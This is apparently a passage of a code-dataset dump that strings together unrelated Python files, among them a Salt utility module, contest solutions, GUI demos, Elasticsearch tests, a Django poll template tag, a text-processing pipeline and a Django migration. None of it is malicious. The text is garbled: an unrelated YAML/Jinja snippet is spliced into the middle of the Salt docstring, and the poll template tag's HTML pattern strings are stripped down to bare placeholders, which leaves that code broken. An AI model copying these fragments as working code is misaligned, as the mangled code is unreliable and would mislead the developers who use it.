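text = "port: {{ 8000 + 80 }}"
data = yaml.safe_load(jinja2.Template(text).render())
print(data)   # {'port': 8080}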
Note, not all renderer modules can work with strings;\n the 'py' renderer requires a file, for example.\n :param default_renderer: The renderer pipe to send the file through; this\n is overridden by a \"she-bang\" at the top of the file.\n :param kwargs: Keyword args to pass to Salt's compile_template() function.\n\n Keep in mind the goal of each renderer when choosing a render-pipe; for\n example, the Jinja renderer processes a text file and produces a string,\n however the YAML renderer processes a text file and produces a data\n structure.\n\n One possible use is to allow writing \"map files\", as are commonly seen in\n Salt formulas, but without tying the renderer of the map file to the\n renderer used in the other sls files. In other words, a map file could use\n the Python renderer and still be included and used by an sls file that uses\n the default 'jinja|yaml' renderer.\n\n For example, the two following map files produce identical results but one\n is written using the normal 'jinja|yaml' and the other is using 'py':\n\n .. code-block:: jinja\n\n #!jinja|yaml\n {% set apache = salt.grains.filter_by({\n ...normal jinja map file here...\n }, merge=salt.pillar.get('apache:lookup')) %}\n {{ apache | yaml() }}\n\n .. code-block:: python\n\n #!py\n def run():\n apache = __salt__.grains.filter_by({\n ...normal map here but as a python dict...\n }, merge=__salt__.pillar.get('apache:lookup'))\n return apache\n\n Regardless of which of the above map files is used, it can be accessed from\n any other sls file by calling this function. The following is a usage\n example in Jinja:\n\n .. code-block:: jinja\n\n {% set apache = salt.slsutil.renderer('map.sls') %}\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' slsutil.renderer salt://path/to/file\n salt '*' slsutil.renderer /path/to/file\n salt '*' slsutil.renderer /path/to/file.jinja 'jinja'\n salt '*' slsutil.renderer /path/to/file.sls 'jinja|yaml'\n salt '*' slsutil.renderer string='Inline template! {{ saltenv }}'\n salt '*' slsutil.renderer string='Hello, {{ name }}.' name='world'\n '''\n if not path and not string:\n raise salt.exceptions.SaltInvocationError(\n 'Must pass either path or string')\n\n renderers = salt.loader.render(__opts__, __salt__)\n\n if path:\n path_or_string = __salt__['cp.get_url'](path)\n elif string:\n path_or_string = ':string:'\n kwargs['input_data'] = string\n\n return salt.template.compile_template(\n path_or_string,\n renderers,\n default_renderer,\n __opts__['renderer_blacklist'],\n __opts__['renderer_whitelist'],\n **kwargs)\n\n\ndef _get_serialize_fn(serializer, fn_name):\n serializers = salt.loader.serializers(__opts__)\n fns = getattr(serializers, serializer, None)\n fn = getattr(fns, fn_name, None)\n\n if not fns:\n raise salt.exceptions.CommandExecutionError(\n \"Serializer '{0}' not found.\".format(serializer))\n\n if not fn:\n raise salt.exceptions.CommandExecutionError(\n \"Serializer '{0}' does not implement {1}.\".format(serializer,\n fn_name))\n\n return fn\n\n\ndef serialize(serializer, obj, **mod_kwargs):\n '''\n Serialize a Python object using a :py:mod:`serializer module\n `\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' --no-parse=obj slsutil.serialize 'json' obj=\"{'foo': 'Foo!'}\n\n Jinja Example:\n\n .. 
code-block:: jinja\n\n {% set json_string = salt.slsutil.serialize('json',\n {'foo': 'Foo!'}) %}\n '''\n kwargs = salt.utils.args.clean_kwargs(**mod_kwargs)\n return _get_serialize_fn(serializer, 'serialize')(obj, **kwargs)\n\n\ndef deserialize(serializer, stream_or_string, **mod_kwargs):\n '''\n Deserialize a Python object using a :py:mod:`serializer module\n `\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' slsutil.deserialize 'json' '{\"foo\": \"Foo!\"}'\n salt '*' --no-parse=stream_or_string slsutil.deserialize 'json' \\\\\n stream_or_string='{\"foo\": \"Foo!\"}'\n\n Jinja Example:\n\n .. code-block:: jinja\n\n {% set python_object = salt.slsutil.deserialize('json',\n '{\"foo\": \"Foo!\"}') %}\n '''\n kwargs = salt.utils.args.clean_kwargs(**mod_kwargs)\n return _get_serialize_fn(serializer, 'deserialize')(stream_or_string,\n **kwargs)\n","sub_path":"salt/modules/slsutil.py","file_name":"slsutil.py","file_ext":"py","file_size_in_byte":6528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"42034162","text":"N = int(input())\nA = sorted(list(map(int, input().split())))\n\nans = 0\nMOD = 10**9+7\ntotal = sum(A)\n\nfor i in range(N-1):\n tmp = A[i]\n total -= tmp\n ans += (tmp * total) % MOD\n ans %= MOD\n\nprint(ans)","sub_path":"atcoder/2020/ABC/0829_abc177/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"13506573","text":"import toga\nfrom toga.style import Pack\nfrom toga.constants import COLUMN, LEFT\n\n\nclass ScrollContainerApp(toga.App):\n def startup(self):\n self.main_window = toga.MainWindow(self.name)\n box = toga.Box()\n box.style.direction = COLUMN\n\n for x in range(100):\n label_text = 'Label %d' % (x)\n box.add(toga.Label(label_text, style=Pack(text_align=LEFT)))\n\n scroller = toga.ScrollContainer()\n scroller.content = box\n\n self.main_window.content = scroller\n self.main_window.show()\n\n\ndef main():\n return ScrollContainerApp('ScrollContainer', 'org.beeware.widgets.scrollcontainer')\n\n\nif __name__ == '__main__':\n app = main()\n app.main_loop()\n","sub_path":"examples/scrollcontainer/scrollcontainer/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"359538817","text":"# -*- coding: utf-8 -*-\n# Licensed to Elasticsearch B.V under one or more agreements.\n# Elasticsearch B.V licenses this file to you under the Apache 2.0 License.\n# See the LICENSE file in the project root for more information\n\nfrom __future__ import unicode_literals\n\nfrom . 
import ElasticsearchTestCase\n\n\nclass TestUnicode(ElasticsearchTestCase):\n def test_indices_analyze(self):\n self.client.indices.analyze(body='{\"text\": \"привет\"}')\n\n\nclass TestBulk(ElasticsearchTestCase):\n def test_bulk_works_with_string_body(self):\n docs = '{ \"index\" : { \"_index\" : \"bulk_test_index\", \"_id\" : \"1\" } }\\n{\"answer\": 42}'\n response = self.client.bulk(body=docs)\n\n self.assertFalse(response[\"errors\"])\n self.assertEqual(1, len(response[\"items\"]))\n\n def test_bulk_works_with_bytestring_body(self):\n docs = b'{ \"index\" : { \"_index\" : \"bulk_test_index\", \"_id\" : \"2\" } }\\n{\"answer\": 42}'\n response = self.client.bulk(body=docs)\n\n self.assertFalse(response[\"errors\"])\n self.assertEqual(1, len(response[\"items\"]))\n","sub_path":"test_elasticsearch/test_server/test_clients.py","file_name":"test_clients.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"300461930","text":"# https://leetcode.com/problems/two-sum/\n\nfrom typing import List\n\n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n cache = {} # { value: idx }\n\n for idx in range(0, len(nums)):\n num = target - nums[idx]\n\n if num in cache:\n return [idx, cache[num]]\n\n cache[nums[idx]] = idx\n\n return\n\n\nsol = Solution()\n\nprint(sol.twoSum([2, 7, 11, 15], 9)) # [0, 1]\n","sub_path":"Easy/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"600488959","text":"from django import template\r\nfrom poll.models import Poll, Item, Queue\r\nfrom django.conf import settings\r\nfrom django.utils.safestring import SafeUnicode\r\nfrom django.utils.datetime_safe import datetime\r\nfrom poll.ajax import authpass\r\n\r\n\r\nregister = template.Library()\r\n\r\n\r\n@register.inclusion_tag('polls.html', takes_context=True)\r\ndef poll(context, poll):\r\n can_vote = True\r\n if poll.queue:\r\n can_vote = authpass(context['user'], poll.queue)\r\n return {'poll': poll,\r\n 'poll_type': poll.print_polltype(),\r\n 'items': Item.objects.filter(poll=poll),\r\n 'user': context['user'],\r\n 'can_vote': can_vote,\r\n 'request': context['request'],\r\n 'STATIC_URL': settings.STATIC_URL}\r\n\r\n\r\n@register.inclusion_tag('polls.html', takes_context=True)\r\ndef poll_queue(context, queue=None):\r\n try:\r\n if not queue:\r\n tmp_polls = Poll.objects.filter(startdate__lte=datetime.now().date)\r\n elif isinstance(queue, SafeUnicode):\r\n tmp_queue = Queue.objects.get(title=queue)\r\n else:\r\n tmp_queue = Queue.objects.get(queue)\r\n\r\n except:\r\n raise Exception('Queue not found')\r\n\r\n if queue:\r\n tmp_polls = Poll.publish_manager.filter(queue=tmp_queue,\r\n startdate__lte=datetime.now())\r\n if len(tmp_polls) > 0:\r\n cur_poll = tmp_polls[0]\r\n return poll(context, cur_poll)\r\n else:\r\n cur_poll = None\r\n\r\n\r\n\r\nclass RenderItemsClass(template.Node):\r\n def __init__(self, poll, items):\r\n self.poll = template.Variable(poll)\r\n self.items = template.Variable(items)\r\n\r\n def render(self, context):\r\n poll = self.poll.resolve(context)\r\n items = self.items.resolve(context)\r\n #'name' = item.pk\r\n pattern1 = u'{3}
    '\r\n pattern2 = u' {3}
    '\r\n result = u''\r\n\r\n #Choose an input type\r\n for item in items:\r\n if item.userbox:\r\n input_type = 'textbox'\r\n pattern = pattern1\r\n else:\r\n poll_type = poll.print_polltype()\r\n\r\n if poll_type == 'Single':\r\n input_type = 'radio'\r\n elif poll_type == 'Multiple':\r\n input_type = 'checkbox'\r\n pattern = pattern2\r\n\r\n result += pattern.format(poll.pk, input_type, item.pk, item.value)\r\n\r\n return result\r\n\r\n\r\n@register.tag\r\ndef render_items(parser, token):\r\n tag, poll, items = token.split_contents()\r\n return RenderItemsClass(poll, items)\r\n","sub_path":"poll/templatetags/polls_tags.py","file_name":"polls_tags.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"466574353","text":"\ndef parseParagraphs(postingData, info):\n\tnumParagraphs = 0\n\tparagraphs = [\"\",\"\",\"\",\"\"]\n\t\n\t# Read the paragraph.txt file into a list\n\tparagraphsData = [line.strip('\\n') for line in open(\"config/paragraphs.txt\")]\n\t\n\t# Read the keywords.txt file, and place the keywords in a list\n\t# keywords = [line.strip('\\n').center(len(line) + 1) for line in open(\"config/keywords.txt\")]\n\t\n\t#postingList = []\n\t#ParagraphList = []\n\t\n\t# Find keywords in posting data, match those with keywords found in paragraphs\n\t#postingList = postingKeywords(postingData, keywords)\n\t\n\t#for line in paragraphs:\n\t#\tfor word in postingList:\n\t#\t\tif word in line:\n\t#\t\t\tprint(\"Yes\")\n\t\n\t#print(postingList)\n\t\n\t# Select paragraphs to use\n\tfor line in paragraphsData:\n\t\tif \"OPENING_PARAGRAPH=\" in line:\n\t\t\tuseless, paragraphs[0] = line.split(\"=\",1)\n\t\t\tparagraphs[0] = paragraphs[0].replace(\"=POSITION\", info[1])\n\t\t\tparagraphs[0] = paragraphs[0].replace(\"=COMPANY\", info[5])\n\t\tif \"CLOSING_PARAGRAPH=\" in line:\n\t\t\tuseless, paragraphs[3] = line.split(\"=\",1)\n\t\t\tparagraphs[3] = paragraphs[3].replace(\"=POSITION\", info[1])\n\t\t\tparagraphs[3] = paragraphs[3].replace(\"=COMPANY\", info[5])\n\t\tif \"PARAGRAPH_1=\" in line:\n\t\t\tuseless, paragraphs[1] = line.split(\"=\",1)\n\t\tif \"PARAGRAPH_2=\" in line:\n\t\t\tuseless, paragraphs[2] = line.split(\"=\",1)\n\t\tif \"PARAGRAPH_\" in line:\n\t\t\tnumParagraphs += 1\n\t\t\n\tprint(\"Number of paragaphs found:\", numParagraphs)\n\treturn paragraphs\n\t\ndef parseInfo(postingData):\n\tinfo = [\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"]\n\t# 00 Position Duration\n\t# 01 Job Title\n\t# 02 Job City\n\t# 03 Job Province / State\n\t# 04 Job Country\n\t# 05 Organization Name\n\t# 06 Department name\n\t# 07 Salutation\n\t# 08 Contact First Name\n\t# 09 Contact Last Name\n\t# 10 Contact Title\n\t# 11 Address Line 1\n\t# 12 Address Line 2\n\t# 13 City\n\t# 14 Province / State\n\t# 15 Postal / Zip Code\n\t# 16 Country\n\n\t# Look through posting data for each required variable\n\tfor line in postingData:\n\t\tif \"Position Duration:\" in line:\n\t\t\twaste, info[0] = line.split(\":\",1)\n\t\tif \"Job Title:\" in line:\n\t\t\twaste, info[1] = line.split(\":\",1)\n\t\tif \"Job City:\" in line:\n\t\t\twaste, info[2] = line.split(\":\",1)\n\t\tif \"Job Province / State:\" in line:\n\t\t\twaste, info[3] = line.split(\":\",1)\n\t\tif \"Job Country:\" in line:\n\t\t\twaste, info[4] = line.split(\":\",1)\n\t\tif \"Organization:\" in line:\n\t\t\twaste, info[5] = line.split(\":\",1)\n\t\tif \"Division / Department:\" in line:\n\t\t\twaste, info[6] = 
line.split(\":\",1)\n\t\tif \"Salutation:\" in line:\n\t\t\twaste, info[7] = line.split(\":\",1)\n\t\tif \"Job Contact First Name:\" in line:\n\t\t\twaste, info[8] = line.split(\":\",1)\n\t\tif \"Job Contact Last Name:\" in line:\n\t\t\twaste, info[9] = line.split(\":\",1)\n\t\tif \"Contact Title:\" in line:\n\t\t\twaste, info[10] = line.split(\":\",1)\n\t\tif \"Address Line One:\" in line:\n\t\t\twaste, info[11] = line.split(\":\",1)\n\t\tif \"Address Line Two:\" in line:\n\t\t\twaste, info[12] = line.split(\":\",1)\n\t\tif \"City:\" in line and not \"Job City:\" in line:\n\t\t\twaste, info[13] = line.split(\":\",1)\n\t\tif \"Province / State:\" in line and not \"Job Province / State:\" in line:\n\t\t\twaste, info[14] = line.split(\":\",1)\n\t\tif \"Postal Code / Zip Code:\" in line:\n\t\t\twaste, info[15] = line.split(\":\",1)\n\t\tif \"Country:\" in line and not \"Job Country:\" in line:\n\t\t\twaste, info[16] = line.split(\":\",1)\n\t\t# Format information\n\t\tinfo[:] = [line.strip() for line in info]\t\t\n\t\n\treturn info\n\t\ndef genFileNameCL(organization, position):\n\tfileName = \"placeholder\"\n\t\n\tif len(organization) + len(position) < 12:\n\t\tfileName = organization + \"_\" + position + \"coverletter\"\n\t\tfileName = \"\".join(fileName.split())\n\telse:\n\t\tfileName = genFileNameCLShort(organization, position)\n\t\n\tfileName = fileName.replace(\".\",\"\")\n\t\n\treturn fileName\n\ndef genFileNameCLShort(organization, position):\n\tfileName = \"placeholder\"\n\t\n\tif len(organization) > 12:\n\t\torganization = ''.join(char for char in organization if char.isupper())\n\t\tprint(\"Using short form for the file name.\")\n\tpositionInitials = ''.join(char for char in position if char.isupper())\n\tfileName = str(organization) + \"_\" + str(positionInitials) + \"_cover_letter\"\n\tfileName = \"\".join(fileName.split())\n\t\n\treturn fileName\n\ndef genFileNameRE(organization, position):\n\tfileName = \"placeholder\"\n\t\n\tif len(organization) + len(position) < 12:\n\t\tfileName = organization + \"_\" + position + \"coverletter\"\n\t\tfileName = \"\".join(fileName.split())\n\telse:\n\t\tfileName = genFileNameREShort(organization, position)\n\t\n\tfileName = fileName.replace(\".\",\"\")\n\t\n\treturn fileName\n\ndef genFileNameREShort(organization, position):\n\tfileName = \"placeholder\"\n\t\n\tif len(organization) > 12:\n\t\torganization = ''.join(char for char in organization if char.isupper())\n\t\tprint(\"Using short form for the file name.\")\n\t\n\tpositionInitials = ''.join(char for char in position if char.isupper())\n\tfileName = str(organization) + \"_\" + str(positionInitials) + \"_resume\"\n\tfileName = \"\".join(fileName.split())\n\t\n\treturn fileName\n\ndef parseUserInfo():\n\tuserInfo = [\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"]\n\t\n\tuserConfigData = [line.strip('\\n') for line in open(\"config/config.txt\")]\n\t\n\tfor line in userConfigData:\n\t\tif \"USER_FIRST_NAME=\" in line:\n\t\t\twaste, userInfo[0] = line.split(\"=\",1)\n\t\tif \"USER_LAST_NAME=\" in line:\n\t\t\twaste, userInfo[1] = line.split(\"=\",1)\n\t\tif \"USER_ADDRESS_ONE=\" in line:\n\t\t\twaste, userInfo[2] = line.split(\"=\",1)\n\t\tif \"USER_ADDRESS_TWO=\" in line:\n\t\t\twaste, userInfo[3] = line.split(\"=\",1)\n\t\tif \"USER_EMAIL=\" in line:\n\t\t\twaste, userInfo[4] = line.split(\"=\",1)\n\t\tif \"USER_CELL=\" in line:\n\t\t\twaste, userInfo[5] = line.split(\"=\",1)\n\t\tif \"USER_WEBSITE_ONE=\" in line:\n\t\t\twaste, userInfo[6] = line.split(\"=\",1)\n\t\tif \"USER_WEBSITE_TWO=\" in 
line:\n\t\t\twaste, userInfo[7] = line.split(\"=\",1)\n\t\t\t\n\treturn userInfo\n","sub_path":"CLR_v2/parse_txt.py","file_name":"parse_txt.py","file_ext":"py","file_size_in_byte":5637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"397864145","text":"from direct.gui.OnscreenImage import OnscreenImage\nfrom direct.gui.OnscreenText import OnscreenText\nfrom panda3d.core import TextNode\nfrom panda3d.core import TransparencyAttrib\n\nfrom src.core.data import Font1\n\nclass ResourceDisplay:\n def __init__(self, root):\n self.root = root.attachNewNode(\"ResourceDisplay\")\n\n self.scienceImg = OnscreenImage(image=\"data/images/science.png\",\n pos=(0, 0, .1),\n scale=0.045,\n parent=self.root)\n self.scienceImg.setTransparency(TransparencyAttrib.MAlpha)\n self.scienceCost = OnscreenText(scale=0.06, pos=(0.06, 0.08), fg=(1, 1, 1, 1), align=TextNode.ALeft,\n parent=self.root, font=Font1)\n\n self.creditsImg = OnscreenImage(image=\"data/images/currency.png\",\n pos=(0, 0, 0),\n scale=0.045,\n parent=self.root)\n self.creditsImg.setTransparency(TransparencyAttrib.MAlpha)\n self.creditsCost = OnscreenText(scale=0.06, pos=(0.06, -.02), fg=(1, 1, 1, 1), align=TextNode.ALeft,\n parent=self.root, font=Font1)\n\n self.fuelImg = OnscreenImage(image=\"data/images/fuel.png\",\n pos=(0, 0, -.1),\n scale=0.045,\n parent=self.root)\n self.fuelImg.setTransparency(TransparencyAttrib.MAlpha)\n self.fuelCost = OnscreenText(scale=0.06, pos=(0.06, -.12), fg=(1, 1, 1, 1), align=TextNode.ALeft,\n parent=self.root, font=Font1)\n\n def update(self, resources):\n self.scienceCost.setText(str(resources[\"science\"]))\n self.creditsCost.setText(str(resources[\"credits\"]))\n self.fuelCost.setText(str(resources[\"fuel\"]))\n\n def setPos(self, x, y, z):\n self.root.setPos(x, y, z)","sub_path":"src/game/build/components/resource_display.py","file_name":"resource_display.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"283657943","text":"# 10진수를 16진수로\ndict={10:'a', 11:'b', 12:'c', 13:'d', 14:'e', 15:'f'}\ndecimal=int(input(\"변환할 십진수를 입력하세요: \"))\nresult = ''\nwhile (decimal > 0):\n remainder = decimal % 16\n if remainder>9:\n remainder=dict[remainder]\n decimal = decimal // 16\n result = str(remainder) + result\nprint(result)\n","sub_path":"04. 
Conditional & Repetitive Statement/decimalToHexadecimal.py","file_name":"decimalToHexadecimal.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"247877142","text":"from textHandler.nominalPhrasesIdentifier.NominalPhrasesIdentifier import NominalPhrasesIdentifier\nfrom textHandler.nominalPhrasesWithTreeTagger.NominalPhrasesIdentifierWithTreeTagger import \\\n NominalPhrasesIdentifierWithTreeTagger\nfrom textHandler.textTokenizer.TextTokenizer import WordSeparator\nfrom textHandler.wordFrequencyCalculator.WordFrequencynator import WordFrequencynator\nfrom jsonHandler.JsonHandler import JsonHandler\n\n\nclass TextHandler(object):\n configuration = {}\n stop_words = {}\n useTreeTagger = True\n\n def __init__(self, configuration: dict):\n self.configuration = configuration\n self.stop_words = {}\n\n def remove_stop_words(self, list_of_tokens: list) -> list:\n if len(self.stop_words) == 0:\n with open(self.configuration['stop_words']) as stopWordsFile:\n self.stop_words = stopWordsFile.read().splitlines()\n filtered_list = []\n for token in list_of_tokens:\n if token.lower() not in self.stop_words:\n filtered_list.append(token)\n return filtered_list\n\n def handle_text(self):\n word_separator = WordSeparator(frozenset(self.configuration['word_separators']),\n frozenset(self.configuration['punctuation_characters']))\n\n list_of_all_tokens = []\n list_of_all_tokens_without_stopwords = []\n keys = ['title', 'description', 'teaser']\n for entry in self.configuration['raw_data']:\n for key in keys:\n if key in entry:\n list_of_tokens = word_separator.separate_words(entry[key])\n list_of_all_tokens.append(list_of_tokens)\n list_of_tokens_without_stop_words = self.remove_stop_words(list_of_tokens)\n list_of_all_tokens_without_stopwords.append(list_of_tokens_without_stop_words)\n\n entries = JsonHandler.get_data_json_from_file(self.configuration['source_text'])\n frequencynator = WordFrequencynator(self.configuration, self.stop_words, keys)\n frequencynator.load_lemmatization_data()\n processedData = []\n\n if self.useTreeTagger:\n nominal_phrases_identifier = NominalPhrasesIdentifierWithTreeTagger(self.configuration['raw_data'])\n else:\n nominal_phrases_identifier = NominalPhrasesIdentifier(list_of_all_tokens)\n\n for key, values in enumerate(entries):\n # packe Ortsangaben in nen schickes location Objektchen\n values['location'] = {\"street\": values['street'], \"district\": values['district']}\n del values['district']\n del values['street']\n\n # ergaenze worthaeufigkeit\n values['words'] = frequencynator.get_word_frequency_from_entry(values)\n\n # ergaenze NPs\n if self.useTreeTagger:\n values['phrases'] = nominal_phrases_identifier.get_phrases_count_from_data(values)\n else:\n values['phrases'] = nominal_phrases_identifier.get_phrases_count_from_data(values, 3)\n\n # print(values['phrases'])\n processedData.append(values)\n\n # tue es weg ins Nirvana\n JsonHandler.create_json_file(self.configuration['path_to_output'] + 'fire.json', processedData)\n","sub_path":"dataEnrichment/textHandler/TextHandler.py","file_name":"TextHandler.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"4543861","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport numpy as np\nfrom django.db import models, migrations\nfrom movie_stats.models import Rater, Movie, Review, Avgmovrate\n\ndef getavgrate(x, 
y):\n # all_rates = Review.objects.all()\n #movrate = [(item.movieId.movieId,Review.objects.filter(movieId = item.movieId)) for item in all_rates]\n \"\"\"for item in all_rates:\n item.movieId.movieId\n mov_list = []\n for movie in Review.objects.filter(movieId = item.movieId):\n mov_list.append(movie.rating)\n avg_mov = np.mean(mov_list)\n avg_save = Avgmovrate.objects.create(movieId=Movie.objects.get(movieId=item.movieId.movieId), avg_mov=avg_mov)\n print(avg_save)\n avg_save.save()\"\"\"\n all_movies = Movie.objects.all()\n for item in all_movies:\n movrate = []\n print(\"Movie\", item)\n for review in Review.objects.filter(movieId = item):\n movrate.append(review.rating)\n #print(item)\n avg_rate = np.mean(movrate)\n if not movrate:\n avg_rate = 0\n print(avg_rate)\n avg_save = Avgmovrate.objects.create(movieId=Movie.objects.get(movieId = item.movieId), avg_mov=avg_rate)\n avg_save.save()\n\n\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('movie_stats', '0017_avgmovrate'),\n ]\n\n operations = [\n migrations.RunPython(getavgrate),\n ]\n","sub_path":"movieratings/movie_stats/migrations/0018_auto_20150701_1828.py","file_name":"0018_auto_20150701_1828.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"98404975","text":"# -*- mode: python; encoding: utf-8 -*-\n#\n# Copyright 2012 Jens Lindström, Opera Software ASA\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not\n# use this file except in compliance with the License. You may obtain a copy of\n# the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
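# --- Editor's note: hedged aside. ---
# In the getavgrate() migration above, np.mean(movrate) runs before the
# empty-list guard, so an empty list first produces a NaN plus a
# RuntimeWarning that is then thrown away. Guarding first avoids that;
# a minimal sketch:
def average_rating(ratings):
    return float(sum(ratings)) / len(ratings) if ratings else 0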
See the\n# License for the specific language governing permissions and limitations under\n# the License.\n\nimport sys\nimport traceback\n\nimport base\nimport mailutils\nimport dbutils\nimport htmlutils\nimport configuration\n\nfrom textutils import json_encode, json_decode\n\nclass OperationResult:\n \"\"\"\\\n Simple container for successful operation result.\n\n The constructor builds a dictionary from all keyword arguments,\n and adds {\"status\": \"ok\"} unless a different \"status\" is specified\n as a keyword argument.\n\n Converting an OperationResult object to string converts this\n dictionary to a JSON object literal.\n \"\"\"\n\n def __init__(self, **kwargs):\n self.__value = kwargs\n if \"status\" not in self.__value:\n self.__value[\"status\"] = \"ok\"\n self.__cookies = {}\n def __str__(self):\n return json_encode(self.__value)\n def set(self, key, value):\n self.__value[key] = value\n def setCookie(self, name, value=None, secure=False):\n self.__cookies[name] = (value, secure)\n return self\n def addResponseHeaders(self, req):\n for name, (value, secure) in self.__cookies.items():\n if value:\n if secure and configuration.base.ACCESS_SCHEME != \"http\":\n modifier = \"Secure\"\n else:\n modifier = \"HttpOnly\"\n cookie = \"%s=%s; Max-Age=31536000; %s\" % (name, value, modifier)\n else:\n cookie = \"%s=invalid; Expires=Thursday 01-Jan-1970 00:00:00 GMT\" % name\n req.addResponseHeader(\"Set-Cookie\", cookie)\n\nclass OperationError(Exception):\n \"\"\"\\\n Exception class for unexpected operation errors.\n\n Converting an OperationError object to string produces a JSON\n object literal with the properties status=\"error\" and\n error=.\n \"\"\"\n\n def __init__(self, message):\n self.__message = message\n def __str__(self):\n return json_encode({ \"status\": \"error\", \"error\": self.__message })\n\nclass OperationFailure(Exception):\n \"\"\"\\\n Exception class for operation failures caused by invalid input.\n\n Converting an OperationError object to string produces a JSON\n object literal with the properties status=\"failure\", title=\n and message=<message>.\n \"\"\"\n\n def __init__(self, code, title, message, is_html=False):\n self.__code = code\n self.__title = htmlutils.htmlify(title)\n self.__message = message if is_html else htmlutils.htmlify(message)\n def __str__(self):\n return json_encode({ \"status\": \"failure\",\n \"code\": self.__code,\n \"title\": self.__title,\n \"message\": self.__message })\n\nclass OperationFailureMustLogin(OperationFailure):\n def __init__(self):\n super(OperationFailureMustLogin, self).__init__(\n \"mustlogin\",\n \"Login Required\",\n \"You have to sign in to perform this operation.\")\n\nclass TypeChecker:\n \"\"\"\\\n Interface for checking operation input type correctness.\n\n Sub-classes implement the method __call__(value, context) which raises an\n OperationError if the input is incorrect.\n\n A type checker structure is created using the static make() function.\n\n \"\"\"\n @staticmethod\n def make(source):\n \"\"\"\\\n Construct a structure of TypeChecker objects.\n\n The source argument should be a dict object, single-element list object,\n a set object containing strings, or str, int or bool (the actual type\n objects, not a string, integer or boolean value).\n\n If the source argument is a dict object, per-element type checkers are\n constructed by calling this function on the value of each item in the\n dictionary. 
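# --- Editor's note: hedged aside. ---
# Usage sketch for TypeChecker.make() as defined in this file (the schema and
# values are hypothetical):
#
#   checker = TypeChecker.make({ "name": str,
#                                "count": int,
#                                "tags": Optional([str]) })
#   checker({ "name": "x", "count": 1 })     # passes silently; "tags" optional
#   checker({ "name": "x", "count": "1" })   # raises OperationError on count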
See DictionaryChecker for details.\n\n If the source argument is a list object, a per-element type checker is\n constructed by calling this function on the value of the single element\n in the list.\n\n If the source argument is a set object, all elements in it should be\n strings, and the constructed checker verifies that the value is a string\n that is a member of the set.\n\n Otherwise the constructed checker verifies that the value is of the type\n of the source argument (or, in the case of source=str, that the value's\n type is either str or unicode).\n\n \"\"\"\n if type(source) is dict: return DictionaryChecker(source)\n elif type(source) is list: return ArrayChecker(source)\n elif type(source) is set:\n if len(filter(lambda x: type(x) is str, source)) == len(source):\n return EnumerationChecker(source)\n return VariantChecker(source)\n elif source is str: return StringChecker()\n elif source is int: return IntegerChecker()\n elif source is bool: return BooleanChecker()\n else: raise base.ImplementationError(\"invalid source type\")\n\nclass Optional:\n \"\"\"\\\n Utility class for signaling that a dictionary member is optional.\n\n \"\"\"\n def __init__(self, source):\n self.source = source\n\nclass DictionaryChecker:\n \"\"\"\\\n Type checker for dictionary objects.\n\n Checks two sets of members: required and optional. Raises an OperationError\n if the checked value is not a dictionary or if any required member is not\n present in it, or if it contains any unexpected members. Applies\n per-element checkers on all required members and on all present optional\n members.\n\n \"\"\"\n def __init__(self, source):\n self.__required = []\n self.__optional = []\n self.__expected = set()\n\n for name, source_type in source.items():\n if isinstance(source_type, Optional):\n self.__optional.append((name, TypeChecker.make(source_type.source)))\n else:\n self.__required.append((name, TypeChecker.make(source_type)))\n self.__expected.add(name)\n\n def __call__(self, value, context=None):\n if not type(value) is dict:\n raise OperationError(\"invalid input: %s is not a dictionary\" % (context if context else \"value\"))\n for name, checker in self.__required:\n child_context = \"%s.%s\" % (context, name) if context else name\n if name not in value:\n raise OperationError(\"invalid input: %s missing\" % child_context)\n else:\n checker(value[name], child_context)\n for name, checker in self.__optional:\n if name in value:\n child_context = \"%s.%s\" % (context, name) if context else name\n checker(value[name], child_context)\n for name in value:\n if name not in self.__expected:\n child_context = \"%s.%s\" % (context, name) if context else name\n raise OperationError(\"invalid input: %s is unexpected\" % child_context)\n\nclass ArrayChecker:\n \"\"\"\\\n Type checker for arrays.\n\n Raises an OperationError if the checked value is not an array. 
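For example, a checker made with TypeChecker.make([int])
    accepts [1, 2] but rejects (1, 2) and [1, \"2\"], since only list objects
    whose elements all pass the per-element checker are valid. 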
